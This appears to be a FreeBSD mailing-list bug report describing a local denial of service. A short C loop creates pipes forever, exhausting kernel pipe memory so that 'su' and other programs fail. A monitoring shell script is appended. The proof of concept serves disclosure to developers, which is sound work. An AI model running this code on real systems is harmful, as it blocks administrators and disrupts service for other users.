From: Ivan Voras
To: freebsd-hackers@freebsd.org
Subject: pipe() resource exhaustion
Date: Mon, 07 Apr 2014 13:02:22 +0200
List-Id: Technical Discussions relating to FreeBSD

Hello,

Last time I mentioned this it didn't get any attention, so I'll try
again. By accident (via a buggy synergy server process) I found that a
simple userland process can exhaust kernel pipe memory (kern.ipc.pipekva
sysctl), with the consequence that new processes which use pipe cannot
be started, which includes "su", by which an administrator could kill
such a process.

The description is simple enough, I don't think a proof of concept is
really needed, but here it is:

step 1: run this as a normal, non-root user:

    #include <errno.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    int main()
    {
            int fd[2];
            int is_error = 0;

            /* Create pipes forever and never close them. */
            while (1) {
                    if (pipe(fd) != 0) {
                            /* Report only the first failure. */
                            if (!is_error) {
                                    printf("%s\n", strerror(errno));
                                    is_error = 1;
                            }
                    }
            }
    }

step 2: try and fail to run "su" in another terminal:

    $ su
    Password:
    su: pipe: Cannot allocate memory

I'm sure this has other implications as well :)

The problem isn't present on all systems: on some it looks like the
limit on fd's is reached faster than the limit on pipekva. Of 5 machines
I tested, 3 running 9.x and 2 running 10.x, both machines running 10.x
exhaust pipekva before fd's, while only one machine running 9.x did
that. Neither machine had increased fd limits above the autotuned
defaults.

Anecdotally, a machine which was running 9.x didn't experience this
problem with synergys, but it did when upgraded to 10.x with no change
to sysctl configuration.
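A monitoring check for the condition reported in the message above, as an added example that is not part of the original post: it compares two `sysctl` snapshots and flags pipe KVA nearing its limit or pipe allocations starting to fail. The post names only kern.ipc.pipekva; kern.ipc.maxpipekva and kern.ipc.pipeallocfail are further FreeBSD sysctls, and the function names, threshold and sample values are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): watch pipe KVA pressure.
# Input is `sysctl name ...` output, one "name: value" pair per line.

# Constructed sample snapshots, so the script also runs off FreeBSD.
SAMPLE_PREV='kern.ipc.maxpipekva: 16777216
kern.ipc.pipekva: 212992
kern.ipc.pipeallocfail: 0'
SAMPLE_NOW='kern.ipc.maxpipekva: 16777216
kern.ipc.pipekva: 16760832
kern.ipc.pipeallocfail: 5312'

# get_val SNAPSHOT NAME -> value of one sysctl, empty if absent
get_val() {
    printf '%s\n' "$1" | awk -F': *' -v n="$2" '$1 == n { print $2; exit }'
}

# pipekva_check PREV NOW [WARN_PCT] -> prints "LEVEL pct=N newfail=N"
# Return code: 0 OK, 1 WARN, 2 CRIT, 3 UNKNOWN (values missing).
pipekva_check() {
    warn=${3:-80}
    max=$(get_val "$2" kern.ipc.maxpipekva)
    used=$(get_val "$2" kern.ipc.pipekva)
    f_now=$(get_val "$2" kern.ipc.pipeallocfail)
    f_prev=$(get_val "$1" kern.ipc.pipeallocfail)
    if [ -z "$max" ] || [ -z "$used" ] || [ "$max" -le 0 ]; then
        echo "UNKNOWN pct=0 newfail=0"; return 3
    fi
    pct=$(( used * 100 / max ))
    newfail=$(( ${f_now:-0} - ${f_prev:-0} ))
    # A counter reset (reboot) gives a negative delta; treat it as no data.
    if [ "$newfail" -lt 0 ]; then newfail=0; fi
    if [ "$newfail" -gt 0 ]; then level=CRIT; rc=2     # allocations failing now
    elif [ "$pct" -ge "$warn" ]; then level=WARN; rc=1 # close to the limit
    else level=OK; rc=0
    fi
    echo "$level pct=$pct newfail=$newfail"
    return $rc
}

# On FreeBSD, feed two live snapshots taken some seconds apart, e.g.
#   prev=$(sysctl kern.ipc.maxpipekva kern.ipc.pipekva kern.ipc.pipeallocfail)
pipekva_check "$SAMPLE_PREV" "$SAMPLE_NOW" || true
```

Run from cron or a monitoring agent under an account that is already root, since the failure mode in the post is that "su" cannot be started once the limit is hit.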